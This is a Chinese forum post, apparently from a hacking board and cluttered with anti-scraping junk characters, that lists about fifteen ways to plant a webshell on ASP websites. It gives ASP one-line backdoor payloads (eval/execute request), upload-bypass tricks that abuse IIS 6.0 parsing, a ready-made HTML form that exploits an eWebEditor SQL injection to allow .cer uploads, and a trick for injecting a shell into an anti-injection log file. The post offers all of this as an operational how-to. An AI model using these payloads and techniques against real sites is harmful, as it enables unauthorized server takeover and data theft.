- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式& v, W3 ]/ r+ R( D; h
8 q) O, X6 J$ s* D% v; \+ R2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
K" _. H$ R3 W3 c6 Y# q6 |% a0 J
1 w1 Q6 Y' I$ U. Q3 n U3.上传漏洞:
: c. v8 @, ?: t) H8 O1 I. l
& A' F$ x6 h# m5 v动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00& f7 ?! @0 n, w- I
0 H6 f j" ^8 r+ N( A3 z逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
6 y3 l% B3 X! \& ^ V
% M, ^: D. _2 b雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp# C: V3 G1 B3 k7 s; m& ]' ^+ r
然后在上传文件里面填要传的图片格式的ASP木马
+ D+ n9 J; z" H) h# r就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
! a; @+ M, w; d7 h1 R7 X/ G/ t4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
$ w; i o9 A+ f. X" x* r# S8 k/ v8 z: p' Q/ K b
<html>9 P$ _& Y. w: ~6 t7 o- D; y- A8 h
<head>
, e/ \6 ^1 ?$ O7 K; q/ y8 F$ m! K u1 ~<title>ewebeditor upload.asp上传利用</title>
2 q6 [( |$ v: i1 T8 ~" j2 n</head>
* S5 v% Z- q5 W<body>
3 R* E3 {3 s, Q<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">( Z. L+ }5 j" z2 q. x m+ O& n/ ~
<input type=file name=uploadfile size=100><br><br>
\% a9 R# u7 H<input type=submit value=Fuck>! o2 N! E H/ W* [$ f8 g) e
</form>( T0 e9 l( b0 @, P3 v
</body>
2 d, e$ I0 F$ f, l</form>
7 r4 A" g8 R& O1 Q2 m</html>3 C$ n) `1 i: Z; S* t4 U1 z9 G
! P: _0 J% F9 d- u! @/ T1 |2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
* g# `% p; _+ O; W* r5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp0 I$ S" o- [) ?# U6 x
. m6 J8 V3 f; N' h1 Z" K6 l利用windows2003解析。建立zjq.asp的文件夹9 j" M9 }* ~# [
. ~0 K6 @+ Z! |2 Z; L6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
G0 J) O/ w$ h! ?. a% H
, r" {7 `5 Y/ k+ L2 P9 }1 a! t ^7.cuteeditor:类似ewebeditor% V) N) }& C" ~, V7 e% `2 R6 k
, @* b; B R6 J- Q* H
8.htmleditor:同上 y- t, _" T v' q( [. b# Q
; x% ?, \+ Q$ O
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
' ?" J' ^7 W+ b" z/ ~# s- U& s7 L' k
<%execute request("value")%><%'<% loop <%:%>
/ y* m% h: b0 z
) Y& D% F0 `& K s<%'<% loop <%:%><%execute request("value")%>
4 e; H3 C4 u* g9 s" _
+ w2 `. C0 w+ i/ b( @6 [9 Y# W3 Y7 M2 L<%execute request("value")'<% loop <%:%>
7 f! c/ G4 \( @9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞% M( ]0 A6 h/ y2 Q( ?$ V; h% T" m
6 q7 X; ?% g. G. j- H" a5 a X10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
: k# o5 Y1 S- z6 j9 ?7 U- t) V; j1 w: u& ^* }# z4 X
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3+ W; \" k# h% X" A5 E
8 i' z, y' E. r/ E# D: _+ M
解析漏洞得到webshell1 M7 @/ G6 E, B7 Y" q: P
/ ~0 J; g- Z& }
12.mssql差异备份,日志备份,前提需知道web路径
- u5 x% F$ K1 O7 X
/ z9 K0 K8 \% t6 U6 [! Z4 U% `, z13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
e# s( P" C! r O- I% `1 u, ^
/ h7 N- N' m' X7 b8 X14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell5 Y$ M/ v i9 C; J/ N6 G4 n/ X
8 @3 `# W, n+ K
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
4 z- P1 \% J/ D5 F: H- l# k+ I8 Z! ~: p6 b _+ _
以上只是本人的一些拙见,并不完善,以后想到了再继续添加+ \4 v7 C( v; j# N2 J
不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|